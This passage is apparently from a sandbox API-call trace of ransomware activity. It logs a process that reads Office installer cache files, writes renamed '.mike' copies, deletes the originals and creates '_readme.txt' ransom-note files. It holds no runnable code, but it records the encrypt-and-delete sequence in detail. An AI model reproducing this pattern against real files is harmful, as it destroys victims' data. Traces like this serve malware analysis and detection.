lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x21935f0*, lpNumberOfBytesWritten=0x2af104*=0x220, lpOverlapped=0x0) returned 1 [0039.649] CloseHandle (hObject=0x264) returned 1 [0039.649] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af130) returned 1 [0039.649] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml"), fInfoLevelId=0x0, lpFileInformation=0x21930d8 | out: lpFileInformation=0x21930d8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x61d)) returned 1 [0039.649] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af12c) returned 1 [0039.649] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0039.650] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0039.650] GetFileType (hFile=0x264) returned 0x1 [0039.650] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0039.650] GetFileType (hFile=0x264) returned 0x1 [0039.650] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x0 [0039.650] ReadFile (in: hFile=0x264, lpBuffer=0x2194724, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af110, lpOverlapped=0x0 | out: lpBuffer=0x2194724*, lpNumberOfBytesRead=0x2af110*=0x61d, lpOverlapped=0x0) returned 1 [0039.652] CloseHandle (hObject=0x264) returned 1 [0039.653] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.mike", lpFilePart=0x0) returned 0x50 [0039.653] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0039.653] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0039.653] GetFileType (hFile=0x264) returned 0x1 [0039.653] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0039.653] GetFileType (hFile=0x264) returned 0x1 [0039.653] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x220 [0039.653] WriteFile (in: hFile=0x264, lpBuffer=0x2199a80*, nNumberOfBytesToWrite=0x620, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x2199a80*, lpNumberOfBytesWritten=0x2af104*=0x620, lpOverlapped=0x0) returned 1 [0039.653] CloseHandle (hObject=0x264) returned 1 [0039.654] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb98, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.mike", lpFilePart=0x0) returned 0x50 [0039.654] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af08c) returned 1 [0039.654] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0039.654] GetFileType (hFile=0x264) returned 0x1 [0039.654] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af088) returned 1 [0039.654] GetFileType (hFile=0x264) returned 0x1 [0039.655] WriteFile (in: hFile=0x264, lpBuffer=0x219ccb4*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af134, lpOverlapped=0x0 | out: lpBuffer=0x219ccb4*, lpNumberOfBytesWritten=0x2af134*=0x20c, lpOverlapped=0x0) returned 1 [0039.656] CloseHandle (hObject=0x264) returned 1 [0039.656] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpFilePart=0x0) returned 0x4b [0039.656] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.mike", lpFilePart=0x0) returned 0x50 [0039.656] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0039.656] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe1d3c480, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe1d3c480, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe1d625e0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x840)) returned 1 [0039.656] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0039.656] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpFilePart=0x0) returned 0x4b [0039.657] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.mike", lpFilePart=0x0) returned 0x50 [0039.657] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0039.657] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x219e458 | out: lpFileInformation=0x219e458*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe1d3c480, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe1d3c480, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe1d625e0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x840)) returned 1 [0039.657] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0039.657] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpFilePart=0x0) returned 0x4b [0039.657] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", dwFileAttributes=0x80) returned 1 [0039.657] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", nBufferLength=0x105, lpBuffer=0x2aed28, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpFilePart=0x0) returned 0x4b [0039.657] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml")) returned 1 [0039.658] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpFilePart=0x0) returned 0x4b [0039.658] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0039.658] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0039.658] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0039.658] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpFilePart=0x0) returned 0x4b [0039.659] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aebbc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\_readme.txt", lpFilePart=0x0) returned 0x4a [0039.659] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0b0) returned 1 [0039.659] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\_readme.txt" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x264 [0039.659] GetFileType (hFile=0x264) returned 0x1 [0039.659] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ac) returned 1 [0039.659] GetFileType (hFile=0x264) returned 0x1 [0039.659] WriteFile (in: hFile=0x264, lpBuffer=0x21a015c*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af148, lpOverlapped=0x0 | out: lpBuffer=0x21a015c*, lpNumberOfBytesWritten=0x2af148*=0x45e, lpOverlapped=0x0) returned 1 [0039.660] CloseHandle (hObject=0x264) returned 1 [0039.660] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0039.660] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0039.660] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aec70, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0039.660] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af164) returned 1 [0039.660] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0039.661] GetFileType (hFile=0x264) returned 0x1 [0039.661] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af160) returned 1 [0039.661] GetFileType (hFile=0x264) returned 0x1 [0039.661] CloseHandle (hObject=0x264) returned 1 [0039.661] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0039.661] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0039.662] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aeca4, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0039.662] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1f8) returned 1 [0039.662] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0039.662] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0039.662] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0039.662] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x21a2130 | out: lpFileInformation=0x21a2130*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x8f8)) returned 1 [0039.662] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0039.662] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0039.662] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0039.662] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x21a244c | out: lpFileInformation=0x21a244c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x8f8)) returned 1 [0039.662] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0039.662] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0039.662] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0039.662] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0039.662] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0039.662] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0039.663] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aed00, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0039.663] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0039.663] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aec84, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0039.663] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec88, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0039.663] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0039.663] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af164 | out: lpFileInformation=0x2af164*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0039.663] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0039.663] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0039.663] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0039.663] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0039.663] GetFileType (hFile=0x264) returned 0x1 [0039.663] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0039.664] GetFileType (hFile=0x264) returned 0x1 [0039.664] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x0 [0039.664] WriteFile (in: hFile=0x264, lpBuffer=0x21a32c8*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x21a32c8*, lpNumberOfBytesWritten=0x2af104*=0x220, lpOverlapped=0x0) returned 1 [0039.664] CloseHandle (hObject=0x264) returned 1 [0039.665] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af130) returned 1 [0039.665] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x21a2dd0 | out: lpFileInformation=0x21a2dd0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x8f8)) returned 1 [0039.665] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af12c) returned 1 [0039.665] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0039.665] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0039.665] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0039.665] GetFileType (hFile=0x264) returned 0x1 [0039.665] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0039.665] GetFileType (hFile=0x264) returned 0x1 [0039.665] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x0 [0039.665] ReadFile (in: hFile=0x264, lpBuffer=0x21a43f0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af110, lpOverlapped=0x0 | out: lpBuffer=0x21a43f0*, lpNumberOfBytesRead=0x2af110*=0x8f8, lpOverlapped=0x0) returned 1 [0039.679] CloseHandle (hObject=0x264) returned 1 [0039.680] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0039.680] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0039.680] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0039.680] GetFileType (hFile=0x264) returned 0x1 [0039.680] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0039.680] GetFileType (hFile=0x264) returned 0x1 [0039.680] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x220 [0039.680] WriteFile (in: hFile=0x264, lpBuffer=0x21aa87c*, nNumberOfBytesToWrite=0x900, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x21aa87c*, lpNumberOfBytesWritten=0x2af104*=0x900, lpOverlapped=0x0) returned 1 [0039.680] CloseHandle (hObject=0x264) returned 1 [0039.681] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb98, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0039.681] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af08c) returned 1 [0039.681] CreateFileW (lpFileName="C:\\MSOCache\\All 